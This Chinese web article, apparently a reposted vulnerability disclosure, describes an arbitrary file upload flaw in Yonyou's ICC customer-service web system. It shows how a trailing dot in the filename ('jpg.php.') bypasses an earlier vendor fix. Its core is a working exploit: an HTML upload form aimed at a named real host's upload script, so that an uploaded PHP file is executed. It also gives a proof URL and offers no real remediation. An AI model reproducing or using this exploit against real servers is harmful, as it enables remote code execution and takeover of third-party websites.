来源:自学PHP网 时间:2015-04-17 14:11 作者: 阅读:次
[导读] 再再暴用友ICC网站客服系统任意文件上传漏洞,看了一下上一个漏洞:http://www.2cto.com/Article/201206/136635.html,发现可以饶过官方修复。详细说明:测试多个网站均存在漏洞。/home/ecccs/web...
再再暴用友ICC网站客服系统任意文件上传漏洞,看了一下上一个漏洞:http://www.2cto.com/Article/201206/136635.html,发现可以饶过官方修复。
详细说明:测试多个网站均存在漏洞。 /home/ecccs/web/5107/upload/screenImagesSave.php 具体自己看源码这里直接给出利用代码。 <form enctype="multipart/form-data" method="post" action="http://icc.5107.cn/5107/upload/screenImagesSave.php?filename=jpg.php."> <input type="file" name="file"> <input type="submit" name="up" value="上传"> </form> 上一个是jpg.php 这个是只要在jpg.php后面加个.那么 上传后一样可以解析 http://www.2cto.com /xxx.php. 这样一样可以解析为php 的。 测试了: http://icc.5107.cn/ 漏洞证明:http://icc.5107.cn/data/guige.txt 修复方案: 你们懂得! 作者 鬼哥 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com